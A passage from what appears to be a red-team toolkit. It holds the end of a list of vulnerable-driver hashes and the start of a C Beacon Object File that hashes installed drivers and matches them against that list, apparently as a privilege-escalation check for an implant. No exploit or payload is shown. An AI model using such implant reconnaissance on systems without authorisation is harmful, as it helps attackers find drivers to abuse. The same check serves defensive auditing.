    "8FF0F73158EC15DE8E548B00608C5822",
    "90A76945FD2FA45FAB2B7BCFDAF6563595F94891",
    "910CB12AA49E9F35ECC4907E8304ADF0DCCA8CF1",
    "91314768DA140999E682D2A290D48B78BB25A35525EA12C1B1F9634D14602B2C",
    "916FB0EB154D7DB937CBF91078AD7925CC9F5698",
    "919B22B086FB2718648E61274E7AE9535EFA9A99",
    "91AFA3DE4B70EE26A4BE68587D58B154C7B32B50B504FF0DC0BABC4EB56578F4",
    "927C2A580D51A598177FA54C65E9D2610F5F212F1B6CB2FBF2740B64368F010A",
    "928D26CCE64AD458E1F602CC2AEA848E0B04EAAF",
    "9368E51EC98E2AD20893A5FC21E6A8B20C5BEE158D5C49CA58649CFF84DB9D68",
    "93B266F38C3C3EAAB475D81597ABBD7CC07943035068BB6FD670DBBE15DE0131",
    "93D873CDF23D5EDC622B74F9544CAC7FE247D7A68E1E2A7BF2879FAD97A3AE63",
    "942C6A8332D5DD06D8F4B2A9CB386FF4",
    "943593E880B4D340F2548548E6E673EF6F61EED3",
    "948FA3149742F73BF3089893407DF1B20F78A563",
    "950A4C0C772021CEE26011A92194F0E58D61588F77F2873AA0599DFF52A160C9",
    "9532893C1D358188D66B0D7B0784BB6B",
    "965D4F981B54669A96C5AB02D09BF0A9850D13862425B8981F1A9271350F28BB",
    "9677A67BF1D6ABB41AD2DD2F7218BB5CD3DF50B7",
    "96E7F6770E12DD05A8ECF7B5D5DCD2FD",
    "97221E16E7A99A00592CA278C49FFBFC",
    "97E90C869B5B0F493B833710931C39ED",
    "982D39A9C76395DD4C826FE77C00A4BD",
    "983310CDCE8397C016BFCFCC9C3A8ABBB5C928B235BC3C3AE3A3CC10EF24DFBD",
    "98763A3DEE3CF03DE334F00F95FC071A",
    "988DABDCF990B134B0AC1E00512C30C4",
    "98C9CBBDB106AE708D4C5F752FB88340E91D9B2C",
    "98CEED786F79288BECC08C3B82C57E8D4BFA1BCA",
    "9923C8F1E565A05B3C738D283CF5C0ED61A0B90F",
    "994F322DEF98C99AEC7EA0036EF5F4B802120458782AE3867D116D55215C56E4",
    "9A237FA07CE3ED06EA924A9BED4A6B99",
    "9A35AE9A1F95CE4BE64ADC604C80079173E4A676",
    "9A91D6E83B8FDEC536580F6617F10DFC64EEDF14EAD29A6A644EB154426622BA",
    "9A9DBF5107848C254381BE67A4C1B1DD",
    "9AB9F3B75A2EB87FAFB1B7361BE9DFB3",
    "9AE0C6D1612A84E664C9896FAFCC50232831F630",
    "9B91A44A488E4D539F2E55476B216024",
    "9BA7C30177D2897BB3F7B3DC2F95AE0A",
    "9C00A44418A8E719C0034F0D55802693",
    "9C24DD75E4074041DBE03BF21F050C77D748B8E9",
    "9CBDB5FB6DC63CB13F10B6333407CBB9",
    "9D07DF024EC457168BF0BE7E0009619F6AC4F13C",
    "9D530642AEB6524691D06B9E02A84E3487C9CDD86C264B105035D925C984823A",
    "9D58F640C7295952B71BDCB456CAE37213BACCDCD3032C1E3AEB54E79081F395",
    "9DFD73DADB2F1C7E9C9D2542981AAA63",
    "9EEF72E0C4D5055F6AE5FE49F7F812DE29AFBF37",
    "9F08FEF63861CFCCEA29134E12D0EF8055DE3D34",
    "9F1229CD8DD9092C27A01F5D56E3C0D59C2BB9F0139ABF042E56F343637FDA33",
    "9F4CE6AB5E8D44F355426D9A6AB79833709F39B300733B5B251A0766E895E0E5",
    "9F70CD5EDCC4EFC48AE21E04FB03BE9D",
    "9FC29480407E5179AA8EA41682409B4EA33F1A42026277613D6484E5419DE374",
    "A00E444120449E35641D58E62ED64BB9C9F518D2",
    "A01C412699B6F21645B2885C2BAE4454",
    "A0E2223868B6133C5712BA5ED20C3E8A",
    "A15235FCEC1C9B65D736661D4BEC0D38",
    "A179C4093D05A3E1EE73F6FF07F994AA",
    "A17C58C0582EE560C72F60764ED63224",
    "A197A02025946ACA96D6E74746F84774DF31249E",
    "A1FA7D8275CCD14A6ADC438EF4B950E7DE4ED26FCBE4B3E184243663B03C83D6",
    "A216803D691D92ACC44AC77D981AA767",
    "A22DEAD5CDF05BD2F79A4D0066FFCF01C7D303EC",
    "A2353030D4EA3AD9E874A0F7FF35BBFA10562C98C949D88CABAB27102BBB8E48",
    "A26E600652C33DD054731B4693BF5B01",
    "A3636986CDCD1D1CB8AB540F3D5C29DCC90BB8F0",
    "A3E507E713F11901017FC328186AE98E23DE7CEA5594687480229F77D45848D8",
    "A42D87DE65D7136620B63D5C4EE017EA",
    "A4680FABF606D6580893434E81C130FF7EC9467A15E6534692443465F264D3C9",
    "A4B2C56C12799855162CA3B004B4B2078C6ECF77",
    "A4FDA97F452B8F8705695A729F5969F7",
    "A55BCD596643362DDB2EE558AA238BAF",
    "A57EEFA0C653B49BD60B6F46D7C441A78063B682",
    "A59006308C4B5D33BB8F34AC6FB16701814FB8DC",
    "A5A4A3C3D3D5A79F3ED703FC56D45011C21F9913001FCBCC43A3F7572CFF44EC",
    "A5CE055E8970DC56498E3525D61E4982",
    "A5F637D61719D37A5B4868C385E363C0",
    "A60C9173563B940203CF4AD38CCF2082",
    "A641E3DCCBA765A10718C9CB0DA7879E",
    "A64354AAC2D68B4FA74B5829A9D42D90D83B040C",
    "A6816949CD469B6E5C35858D19273936FAB1BEF6",
    "A785B3BC4309D2EB111911C1B55E793F",
    "A7C2E7910942DD5E43E2F4EB159BCD2B4E71366E34A68109548B9FB12AC0F7CC",
    "A7C8F4FAF3CBB088CAC7753D81F8EC4C38CCB97CD9DA817741F49272E8D01200",
    "A7D827A41B2C4B7638495CD1D77926F1BA902978",
    "A860D74C13D125D7C6253A4DC3B47DDF",
    "A86150F2E29B35369AFA2CAFD7AA9764",
    "A87D6EAC2D70A3FBC04E59412326B28001C179DE",
    "A899B659B08FBAE30B182443BE8FFB6A6471C1D0497B52293061754886A937A3",
    "A89CA92145FC330ADCED0DD005421183",
    "A91730E65008B73D9264E8254792AE19208F5C69",
    "A92BF3C219A5FA82087B6C31BDF36FF3",
    "A93197C8C1897A95C4FB0367D7451019AE9F3054",
    "A951953E3C1BB08653ED7B0DAEC38BE7B0169C27",
    "A9F220B1507A3C9A327A99995FF99C82",
    "AAA066705016399E8FA11D71DF937FD089550064",
    "AB0925398F3FA69A67EACEE2BBB7B34AC395BB309DF7FC7A9A9B8103EF41ED7A",
    "AB53D07F18A9697139DDC825B466F696",
    "AB7F8DE9C8BA5FC8692E02F3AE4548CD08DDB17D",
    "AB859723016484790C87B2218931D55F",
    "AC13941F436139B909D105AD55637E1308F49D9A",
    "AC5BD1E80E59B3C5C15B298F269BF065F57AC3F2",
    "AC600A2BC06B312D92E649B7B55E3E91E9D63451",
    "ACACEBEA32C33FC1315D9549504A6B0CABD1E974",
    "AD23D77A38655ACB71216824E363DF8AC41A48A1A0080F35A0D23AA14B54460B",
    "AE55A0E93E5EF3948ADECF20FA55B0F555DCF40589917A5BFBAA732075F0CC12",
    "AE5EB2759305402821AEDDC52BA9A6D6",
    "AE79E760C739D6214C1E314728A78A6CB6060CCE206FDE2440A69735D639A0A2",
    "AEC96520E85330594D3165C86CB92EAC34C1E095",
    "AFBB28A756E233D32E224A664763F79C",
    "AFDB17F38361130453EA1098C7DDB754",
    "AFDD66562DEA51001C3A9DE300F91FC3EB965D6848DFCE92CCB9B75853E02508",
    "AFFE4764D880E78B2AFB2643B15B8D41",
    "B0032B8D8E6F4BD19A31619CE38D8E010F29A816",
    "B03F26009DE2E8EABFCF6152F49B02A55C5E5D0F73E01D48F5A745F93CE93A29",
    "B0954711C133D284A171DD560C8F492A",
    "B0A684474EB746876FAA617A28824BEE93BA24F0",
    "B0CAA4F3AC2841BE683933A6AF9BEE0E",
    "B0DCDBDC62949C981C4FC04CCEA64BE008676D23506FC05637D9686151A4B77F",
    "B10B210C5944965D0DC85E70A0B19A42",
    "B1266873FA36A2104FD5D7F498A9957BC3D9D450",
    "B12D1630FD50B2A21FD91E45D522BA3A",
    "B17507A3246020FA0052A172485D7B3567E0161747927F2EDF27C40E310852E0",
    "B179E1AB6DC0B1AEE783ADBCAD4AD6BB75A8A64CB798F30C0DD2EE8AAF43E6DE",
    "B1B8E6B85DD03C7F1290B1A071FC79C1",
    "B205835B818D8A50903CF76936FCF8160060762725BD74A523320CFBD091C038",
    "B21CBA198D721737AABD882ADA6C91295A5975ED",
    "B2247E68386C1BDFD48687105C3728EBBAD672DAFFA91B57845B4E49693FFD71",
    "B242B0332B9C9E8E17EC27EF10D75503D20D97B6",
    "B2600502A5B962B8CDFAC2EAD24B17B4",
    "B2BC7514201727D773C09A1CFCFAE793FCDBAD98024251CCB510DF0C269B04E6",
    "B31A85406AC9A6A69BFBEE74D6DC67D9D7BDDEE6",
    "B34361D151C793415EF92EE5D368C053",
    "B406920634361F4B7D7C1EC3B11BB40872D85105",
    "B47DEE29B5E6E1939567A926C7A3E6A4",
    "B480C54391A2A2F917A44F91A5E9E4590648B332",
    "B49AC8FEFC6D1274D84FEF44C1E5183CC7ACCBA1",
    "B4D014B5EDD6E19CE0E8395A64FAEDF49688ECB5",
    "B4DCDBD97F38B24D729B986F84A9CDB3FC34D59F",
    "B583414FCEE280128788F7B39451C511376FE821F455D4F3702795E96D560704",
    "B76C3EA60293DAE12076EBE5812F53FF85370B78",
    "B78EB7F12BA718183313CF336655996756411B7DCC8648157AAA4C891CA9DBEE",
    "B85078EF651F74919BF971CBDD87BCDC498DBEE5",
    "B89A8EEF5AEAE806AF5BA212A8068845CAFDAB6F",
    "B8D19CD28788CE4570623A5433B091A5FBD4C26D",
    "B941C8364308990EE4CC6EADF7214E0F",
    "B9C3F4DCC7463CBEC84B808D880194BBC304CCD0",
    "BA2C0FA201C74621CDDD8638497B3C70",
    "BA86E444AE837476E7CCDD06F8867795",
    "BAE1F127C4FF21D8FE45E2BBFC59C180",
    "BB1135B51ACCA8348D285DC5461D10E8F57260E7D0C8CC4A092734D53FC40CBC",
    "BB1A15843D376690F9224C957CA030FBDE9B5BAD",
    "BB50818A07B0EB1BD317467139B7EB4BAD6CD89053FECDABFEAE111689825955",
    "BBBC9A6CC488CFB0F6C6934B193891EB",
    "BBC0B9FD67C8F4CEFA3D76FCB29FF3CEF996B825",
    "BBC1E5FD826961D93B76ABD161314CB3592C4436",
    "BBF564A02784D53B8006333406807C3539EE4A594585B1F3713325904CB730EC",
    "BC1EEB4993A601E6F7776233028AC095",
    "BC2606740E4648C3732541DB929F2E02EA8567520D35DE57C671E93C71E632F3",
    "BC2F3850C7B858340D7ED27B90E63B036881FD6C",
    "BCE7F34912FF59A3926216B206DEB09F",
    "BD067EFB8CAFD971142BC964B4F85DF1",
    "BDA102AFBC60F3F3C5BCBD5390FFBBBB89170B9C",
    "BDC73F752C1353D41E877D8BF42A1C53F0BBA7D6F52348AAEF60E06F4D3087D0",
    "BDD8DC8880DFBC19D729CA51071DE288",
    "BDFB1A2B08D823009C912808425B357D22480ECC",
    "BE03E9541F56AC6ED1E81407DCD7CC85C0FFC538C3C2C2C8A9C747EDBCF13100",
    "BE54F7279E69FB7651F98E91D24069DBC7C4C67E65850E486622CCBDC44D9A57",
    "BE9EEEA2A8CAC5F6CD92C97F234E2FE1",
    "BEA8C6728D57D4B075F372AC82B8134AC8044FE13F533696A58E8864FA3EFEE3",
    "BEDC99BBCEDAF89E2EE1AA574C5A2FA4",
    "BF87ECD70EEC427B2090A34781C49BBF5C7B3500",
    "BFC2EF3B404294FE2FA05A8B71C7F786B58519175B7202A69FE30F45E607FF1C",
    "BFE55CACC7C56C9F7BD75BDB4B352C0B745D071B",
    "C00AD2A252B53CF2D0DC74B53D1AF987982E1AD1",
    "C02F70960FA934B8DEFA16A03D7F6556",
    "C07C37BAB9208DCECA35FBE154684ED6C6450E5C",
    "C0E2A64BA0D23AB95258372457060143",
    "C1130E09831C7A2E0CC8BA7335E702910B25F526",
    "C15EB30E806AD5E771B23423FD2040B0",
    "C1C4310E5D467D24E864177BDBFC57CB5D29AAC697481BFA9C11DDBEEBFD4CC8",
    "C1C869DEEE6293EEE3D0D84B6706D90FAB8F8558",
    "C1D063C9422A19944CDAA6714623F2EC",
    "C1D5CF8C43E7679B782630E93F5E6420CA1749A7",
    "C201D5D0AB945095C3B1A356B3B228AF1AA652FC",
    "C24800C382B38707E556AF957E9E94FD",
    "C299063E3EAE8DDC15839767E83B9808FD43418DC5A1AF7E4F44B97BA53FBD3D",
    "C2C1B8C00B99E913D992A870ED478A24",
    "C3F8B7F0995073ABB58C2AEC1B6062F89FE838A0",
    "C47B890DDA9882F9F37ECCC27D58D6A774A2901F",
    "C49A1956A6A25FFC25AD97D6762B0989",
    "C4BACBAEA0B1AE94C6C9583BA27B2FBE",
    "C4ED28FDFBA7B8A8DFE39E591006F25D39990F07",
    "C5050A2017490FFF7AA53C73755982B339DDB0FD7CEF2CDE32C81BC9834331C5",
    "C509935F3812AD9B363754216561E0A529FC2D5B8E86BFA7302B8D149B7D04AA",
    "C52CEF5B9E1D4A78431B7AF56A6FDB6AA1BCAD65",
    "C533D6D64B474FFC3169A0E0FC0A701A",
    "C552DAE8EAADD708A38704E8D62CF64D",
    "C60CF6DEA446E4A52C6B1CFC2A76E9AADD954DAB",
    "C60FCFF9C8E5243BBB22EC94618B9DCB02C59BB49B90C04D7D6AB3EBBD58DC3A",
    "C61876AACA6CE822BE18ADB9D9BD4260",
    "C6BD965300F07012D1B651A9B8776028C45B149A",
    "C6D349823BBB1F5B44BAE91357895DBA653C5861",
    "C725919E6357126D512C638F993CF572112F323DA359645E4088F789EB4C7B8C",
    "C796A92A66EC725B7B7FEBBDC13DC69B",
    "C7A57CD4BEA07DADBA2E2FB914379910",
    "C7D4943DDAC34E1A38692C624D799E634AD4C4E3AE7E3BB2AE4CF0D8EB8985BC",
    "C842827D4704A5EF53A809463254E1CC",
    "C881F43C7FE94A6F056A84DA8E9A32FE56D8DD9C",
    "C8D3784A3AB7A04AD34EA0ABA32289CA",
    "C8D520D4CE717C17F4D9AAEDC5B0070F94955C12",
    "C901887F28BBB55A10EB934755B47227",
    "C92A386622F04A5733CB238D33CEDEA4272A3F85",
    "C948AE14761095E4D76B55D9DE86412258BE7AFD",
    "C996D7971C49252C582171D9380360F2",
    "C9CF1D627078F63A36BBDE364CD0D5F2BE1714124D186C06DB5BCDF549A109F8",
    "CB22723FAA5AE2809476E5C5E9B9A597B26CAB9B",
    "CB3DE54667548A5C9ABF5D8FA47DB4097FCEE9F1",
    "CB5229ACDF87493E45D54886E6371FC59FC09EE5",
    "CB57F3A7FE9E1F8E63332C563B0A319B26C944BE839EABC03E9A3277756BA612",
    "CB9890D4E303A4C03095D7BC176C42DEE1B47D8AA58E2F442EC1514C8F9E3CEC",
    "CBB8239A765BF5B2C1B6A5C8832D2CAB8FEF5DEACADFB65D8ED43EF56D291AB6",
    "CC0E0440ADC058615E31E8A52372ABADF658E6B1",
    "CC383AD11E9D06047A1558ED343F389492DA3AC2B84B71462AEE502A2FA616C8",
    "CC687FE3741BBDE1DD142EAC0EF59FD1D4457DAEE43CDDE23BB162EF28D04E64",
    "CC78C9C5871AB6B9D9EC9F9FFEC122C109E4C5FE",
    "CCD547EF957189EDDB6EE213E5E0136E980186F9",
    "CCDD3A1EBE9A1C8F8A72AF20A05A10F11DA1D308",
    "CCF523B951AFAA0147F22E2A7AAE4976",
    "CD248648EAFCA6EF77C1B76237A6482F449F13BE",
    "CD9F0FCECF1664FACB3671C0130DC8BB",
    "CE0A4430D090BA2F1B46ABEAAE0CB5FD176AC39A236888FA363BF6F9FD6036D9",
    "CE549714A11BD43B52BE709581C6E144957136EC",
    "CE59E4AB8405192DD47BE9A762C197D8",
    "CF16A2218FC8A3B6FA5AA4A0BC6205792798078C380CCC7E5041476E0F1BC53D",
    "CFAB93885E5129A86D13FD380D010CC8C204429973B776AB1B472D84A767930F",
    "D022F5E3C1BBA43871AF254A16AB0E378EA66184",
    "D028783637B9B3CA567DCEF0FB50156BF1620836",
    "D04F5388E962CD21462BCC54180E84E0",
    "D052DC4AC3C5BFE34F04ABC62A153847",
    "D057E709AE69B3BBB66E199B0E0858429790F995",
    "D0D39E1061F30946141B6ECFA0957F8CC3DDEB63",
    "D10A054C6C3B1243CB13FF6648CD5DE21A0B6548",
    "D205286BFFDF09BC033C09E95C519C1C267B40C2EE8BAB703C6A2D86741CCD3E",
    "D2588631D8AAE2A3E54410EAF54F0679",
    "D25904FBF907E19F366D54962FF543D9F53B8FDFD2416C8B9796B6A8DD430E26",
    "D28DCE7C692171E605989EE37BC5EA5A053F8AD7",
    "D2E6FC9259420F0C9B6B1769BE3B1F63EB36DC57",
    "D2FB46277C36498E87D0F47415B7980440D40E3D",
    "D302AE7F016299AF323A3542D840004888AB91FF",
    "D3E40644A91327DA2B1A7241606FE559",
    "D48757B74EFF02255F74614F35AA27ABBE3F72C7",
    "D4F7C14E92B36C341C41AE93159407DD",
    "D5562FB90B0B3DEB633AB335BCBD82CE10953466A428B3F27CB5B226B453EAF3",
    "D569D4BAB86E70EFBCDFDAC9D822139D6F477B7C",
    "D5A642329CCE4DF94B8DC1BA9660AE34",
    "D5DB81974FFDA566FA821400419F59BE",
    "D6E9F6C67D9B3D790D592557A7D57C3C",
    "D7698828CDC3C96CC17FE2D4FF6D93BB0CD355D8",
    "D77FB9FB256B0C2EC0258C39B80DC513",
    "D7BC7306CB489FE4C285BBEDDC6D1A09E814EF55CF30BD5B8DAF87A52396F102",
    "D7E8AEF8C8FEB87CE722C0B9ABF34A7E6BAB6EB4",
    "D7F12C8D515A0AD401FA02CC8AC42B11B5B7FA55",
    "D7F7594FF084201C0D9FA2F4EF1626635B67BCE5",
    "D8498707F295082F6A95FD9D32C9782951F5A082",
    "D84E3E250A86227C64A96F6D5AC2B447674BA93D399160850ACB2339DA43EAE5",
    "D8B58F6A89A7618558E37AFC360CD772B6731E3BA367F8D58734ECEE2244A530",
    "D8FC8E3A1348393C5D7C3A84BCBAE383D85A4721A751AD7AFAC5428E5E579B4E",
    "D95C9A241E52B4F967FA4CDB7B99FC80",
    "D988F9A62B8A4936A47AA70D6BC52C27",
    "D9AAFC513BE1C4C57B9F9827E986039C",
    "D9C24542DD04D2562AE9E050061CEE1D",
    "D9CE18960C23F38706AE9C6584D9AC90",
    "D9E7E5BCC5B01915DBCEF7762A7FC329",
    "DA689E8E0E3FC4C7114B44D185EEF4C768E15946",
    "DA6CA1FB539F825CA0F012ED6976BAF57EF9C70143B7A1E88B4650BF7A925E24",
    "DACB62578B3EA191EA37486D15F4F83C",
    "DB2A9247177E8CDD50FE9433D066B86FFD2A84301AA6B2EB60F361CFFF077004",
    "DB3538F324F9E52DEFABA7BE1AB991008E43D012",
    "DB72DEF618CBC3C5F9AA82F091B54250",
    "DBA8DB472E51EDD59F0BBAF4E09DF71613D4DD26FD05F14A9BC7E3FC217A78AA",
    "DBC415304403BE25AC83047C170B0EC2",
    "DC0E97ADB756C0F30B41840A59B85218CBDD198F",
    "DC55217B6043D819EADEBD423FF07704EE103231",
    "DC943BF367AE77016AE399DF8E71D38A",
    "DCD026FD2FF8D517E2779D67B3D2D5F9A7AA39F19C66FA8FF2CAB66D5C6461C6",
    "DD2B90C9796237036AC7136A172D96274DEA14C8",
    "DD4FEDD5662122CBFE046A12E2137294EF1CB7822238D9E24EACC78F22F8E93D",
    "DD573F23D656818036FC9AE1064EDA31ACA86ACB9BC44A6E127DB3EA112A9094",
    "DD628061D6E53F3F0B44F409AD914B3494C5D7B5FF6FF0E8FC3161AACEC93E96",
    "DDBE809B731A0962E404A045AB9E65A0B64917AD",
    "DE1CC5C266140BFF9D964FAB87A29421",
    "DEC8A933DBA04463ED9BB7D53338FF87F2C23CFB79E0E988449FC631252C9DCC",
    "DED2927F9A4E64EEFD09D0CABA78E94F309E3A6292841AE81D5528CAB109F95D",
    "DEDD07993780D973C22C93E77AB69FA3",
    "DFAEFD06B680F9EA837E7815FC1CC7D1F4CC375641AC850667AB20739F46AD22",
    "E05EEB2B8C18AD2CB2D1038C043D770A0D51B96B748BC34BE3E7FC6F3790CE53",
    "E076DADF37DD43A6B36AEED957ABEE9E",
    "E0D12E44DB3F57EE7EA723683A6FD346DACF2E3E",
    "E1069365CB580E3525090F2FA28EFD4127223588",
    "E1980C6592E6D2D92C1A65ACAD8F1071B6A404097BB6FCCE494F3C8AC31385CF",
    "E22495D92AC3DCAE5EEB1980549A9EAD8155F98A",
    "E2DB558C3996BB34FBF21017F0CE5591",
    "E2EC3B2A93C473D88BFDF2DEB1969D15AB61737ACC1EE8E08234BC5513EE87EA",
    "E3048CD05573DC1D30B1088859BC728EF67AAAD0",
    "E33EAC9D3B9B5C0DB3DB096332F059BF315A2343",
    "E3D290406DE40C32095BD76DC88179FB",
    "E4266262A77FFFDEA2584283F6C4F51D",
    "E44297A2B750EC1958BEF265E2F1AE6FA4323B28",
    "E4658D93544F69F5CB9AA6D9FEC420FECC8750CB57E1E9798DA38C139D44F2EB",
    "E4A7DA2CF59A4A21FC42B611DF1D59CAE75051925A7DDF42BF216CC1A026EADB",
    "E4EA7EBFA142D20A92FBE468A77EAFA6",
    "E5B0772BE02E2BC807804874CF669E97AA36F5AFF1F12FA0A631A3C7B4DD0DC8",
    "E6305DDDD06490D7F87E3B06D09E9D4C1C643AF0",
    "E6A7A497010579FDE69CD52BED8DE28DB610C33BBC5CE0774459DCF64657B802",
    "E6CB1728C50BD020E531D19A14904E1C",
    "E700A820F117F65E813B216FCCBF78C9",
    "E702221D059B86D49ED11395ADFFA82EF32A1BCE",
    "E74B6DDA8BC53BC687FC21218BD34062A78D8467",
    "E75714F8E0FF45605F6FC7689A1A89C7DCD34AAB66C6131C63FEFACA584539CF",
    "E79C91C27DF3EAF82FB7BD1280172517",
    "E7A3DB3FE70E8B0C4AAA1C5E9DE8DA5A",
    "E7F1F0E62E40BA70AA3227A006F8587B753B4EA3",
    "E83458C4A6383223759CD8024E60C17BE4E7C85F",
    "E86CB77DE7B6A8025F9A546F6C45D135F471E664963CF70B381BEE2DFD0FDEF4",
    "E88259DE797573FA515603AD3354AED0BCE572F1",
    "E8EBBA56EA799E1E62748C59E1A4C586",
    "E8F177545ACC656C837B74102CD76527",
    "E92817A8744EBC4E4FA5383CDCE2B2977F01ECD4",
    "E9BB5B44D73669D74DCCA8DBE64CC3D8",
    "E9E786BDBA458B8B4F9E93D034F73D00",
    "EA0B9EECF4AD5EC8C14AEC13DE7D661E7615018B1A3C65464BF5ECA9BBF6DED3",
    "EA3C5569405ED02EC24298534A983BCB5DE113C18BC3FD01A4DD0B5839CD17B9",
    "EA85BBE63D6F66F7EFEE7007E770AF820D57F914C7F179C5FEE3EF2845F19C41",
    "EA877092D57373CB466B44E7DBCAD4CE9A547344",
    "EAC1B9E1848DC455ED780292F20CD6A0C38A3406",
    "EB0A8EEB444033EBF9B4B304F114F2C8",
    "EB525D99A31EB4FFF09814E83593A494",
    "EB93D2F564FEA9B3DC350F386B45DE2CD9A3E001",
    "EBF6BE42D39FD5D9361AFA43479F883FF8EBA97D72F313ECE289F78CB51C22F2",
    "ECE0A900EA089E730741499614C0917432246CEB5E11599EE3A1BB679E24FD2C",
    "ECEB51233F013E04406DA11482324D45E70281C7",
    "ED6348707F177629739DF73B97BA1B6E",
    "EDE9A3858A12D5DDEA21A310E5721BF86C2248539F42C9E0C3C29AE5B0148BA5",
    "EDEB35E4341034B2DE389017C4884B081A821F34349A620897A2A845C84CB09E",
    "EEA53103E7A5A55DC1DF79797395A2A3E96123EBD71CDD2DB4B1BE80E7B3F02B",
    "EF32D203A12462403C205B39EB4EEF5B",
    "EF80DA613442047697BEC35EA228CDE477C09A3D",
    "EFF3A9CC3E99EF3DDAE57DF72807F0C7",
    "F026460A7A720D0B8394F28A1F9203DC",
    "F0470F82BA58BC4309F83A0F2AEFA4D5",
    "F052DC35B74A1A6246842FBB35EB481577537826",
    "F05B1EE9E2F6AB704B8919D5071BECBCE6F9D0F9D0BA32A460C41D5272134ABE",
    "F08EBAF4493E99F4F095A4F7696287D4",
    "F0C463D29A5914B01E4607889094F1B7D95E7AAF",
    "F10EC1B88C3A383C2A0C03362D31960836E3FB5F",
    "F142E613D2EBC11C6BEC22BAF9392337",
    "F16B44CCA74D3C3645E4C0A6BB5C0CB9",
    "F1718A005232D1261894B798A60C73D971416359B70D0E545D7E7A40ED742B71",
    "F18E669127C041431CDE8F2D03B15CFC20696056",
    "F1A203406A680CC7E4017844B129DCBF",
    "F1B3BDC3BEB2DCA19940D53EB5A0AED85B807E30",
    "F1C8C3926D0370459A1B7F0CF3D17B22FF9D0C7F",
    "F2F728D2F69765F5DFDA913D407783D2",
    "F36A47EDFACD85E0C6D4D22133DD386AEE4EEC15",
    "F40435488389B4FB3B945CA21A8325A51E1B5F80F045AB019748D0EC66056A8B",
    "F406C5536BCF9BACBEB7CE8A3C383BFA",
    "F42453C6A062BDC95D84E3C7CF1521A94AE615E5",
    "F42F28D164205D9F6DAB9317C9FECAD54C38D5D2",
    "F5051C756035EF5DE9C4C48BACB0612B",
    "F51BDB0AD924178131C21E39A8CCD191E46B5512B0F2E1CC8486F63E84E5D960",
    "F53FA44C7B591A2BE105344790543369",
    "F5696FB352A3FBD14FB1A89AD21A71776027F9AB",
    "F5938DB81D1E620B5C89CA0C5F157A33",
    "F596E64F4C5D7C37A00493728D8756B243CFDC11E3372D6D6DFEFFC13C9AB960",
    "F5D58452620B55C2931CBA75EB701F4CDE90A9E4",
    "F6D7FADDC3A56875A8D24E4785A139141DD892968F70BF0E37D505AF9A3324FD",
    "F6F11AD2CD2B0CF95ED42324876BEE1D83E01775",
    "F7393FB917AED182E4CBEF25CE8AF950",
    "F744ABB99C97D98E4CD08072A897107829D6D8481AEE96C22443F626D00F4145",
    "F7B3112B9745B766C8359D25E315975D3159935A8DDB3E3035D21ED124A9013F",
    "F7CE71891738A976CD8D4B516C8D7A8E2F6B0AD6",
    "F7D72D22CD4AD3E44FD617BDB4C90B9A884F4EB045688C0E3FB64DD33E033EAA",
    "F8430BDC6FD01F42217D66D87A3EF6F66CB2700EBB39C4F25C8B851858CC4B35",
    "F853ABE0DC162601E66E4A346FAED854",
    "F8886A9C759E0426E08D55E410B02C5B05AF3C287B15970175E4874316FFAF13",
    "F8C07B6E2066A5A22A92D9F521ECDEB8C68698C400E4B83E0501B9F340957C22",
    "F8D7369527CC6976283CC73CD761F93BD1CEC49D",
    "F929BEAD59E9424AB90427B379DCDD63FBFE0C4FB5E1792E3A1685541CD5EC65",
    "F9418B5E90A235339A4A1A889490FACA39CD117A51BA4446DAA1011DA06C7ECD",
    "FAA61346430AEDC952D820F7B16B973C9BF133C3",
    "FAA870B0CB15C9AC2B9BBA5D0470BD501CCD4326",
    "FAC8EB49E2FD541B81FCBDEB98A199CB",
    "FAFA1BB36F0AC34B762A10E9F327DCAB2152A6D0B16A19697362D49A31E7F566",
    "FB0DBC3B9C897B7571B94FB2203FFB1AC0FACFE366B2CB1F91904EA5335018F0",
    "FBF8B0613A2F7039AEB9FA09BD3B40C8FF49DED2",
    "FC62B746E0E726537BF848B48212F46DB585AF6D",
    "FCD615DF88645D1F57FF5702BD6758B77EFEA6D0",
    "FCDFE570E6DC6E768EF75138033D9961F78045ADCA53BEB6FDB520F6417E0DF1",
    "FD33FB2735CC5EF466A54807D3436622407287E325276FCD3ED1290C98BD0533",
    "FD388CF1DF06D419B14DEDBEB24C6F4DFF37BEA26018775F09D56B3067F0DE2C",
    "FD3B7234419FAFC9BDD533F48896ED73",
    "FD7DE498A72B2DAF89F321D23948C3C4",
    "FD80C3D38669B302DE4B4B736941C0D1",
    "FE10018AF723986DB50701C8532DF5ED98B17C39",
    "FE937E1ED4C8F1D4EAC12B065093AE63",
    "FFF7EE0FEBB8C93539220CA49D4206616E15C666",
    NULL // End of array
};

#endif // VULNDRIVERS_H


================================================
FILE: SAL-BOF/privcheck/vulnerabledrivers.c
================================================
#include <windows.h>
#include <stdio.h>
#include <wincrypt.h>

#include "bofdefs.h"
#include "beacon.h"
#include "vulndrivers.h"

#define BUFSIZE		1024
#define SHA256LEN	32
#define SHA1LEN		20
#define MD5LEN		16

// Compare calculated hash to all known vulnerable hashes
BOOL CompareHashToVuln(char* DriverHash) {
    int i = 0;

    // Check if vulnerable hash exists in list
    while (VulnerableHashes[i]) {
        if (MSVCRT$_stricmp(VulnerableHashes[i], DriverHash) == 0) {
            return TRUE;
        }
        i++;
    }
    // If not, just continue
    return FALSE;
}


// Resolve the absolute path of drivers
void resolveDriverImagePath(char* imagePath, char* resolvedPath, size_t pathSize) {
    char szSystemRoot[MAX_PATH * 2];

    // Resolve the SystemRoot variable to path
    if (!KERNEL32$GetEnvironmentVariableA("SystemRoot", szSystemRoot, sizeof(szSystemRoot))) {
        BeaconPrintf(CALLBACK_OUTPUT,"[ERROR] Failed to resolve SystemRoot for path: %s\n", imagePath);
    }

    if (MSVCRT$_strnicmp(imagePath, "\\SystemRoot\\", 12) == 0) {
        // Replace "\SystemRoot" with the SystemRoot environment variable
        USER32$wsprintfA(resolvedPath, "%s%s", szSystemRoot, imagePath + 11);
    }
    else if (MSVCRT$_strnicmp(imagePath, "System32\\", 9) == 0) {
        // Prepend SystemRoot to paths starting with "System32\"
        USER32$wsprintfA(resolvedPath, "%s\\%s", szSystemRoot, imagePath);
    }
    else if (MSVCRT$_strnicmp(imagePath, "\\??\\", 4) == 0) {
        // Remove the "\\??\\" prefix
        MSVCRT$strncpy(resolvedPath, imagePath + 4, pathSize - 1);
        resolvedPath[pathSize - 1] = '\0';  // Ensure null-termination
    }
    else {
        // Otherwise, leave it as is
        MSVCRT$strncpy(resolvedPath, imagePath, pathSize - 1);
        resolvedPath[pathSize - 1] = '\0';  // Ensure null-termination
    }
}

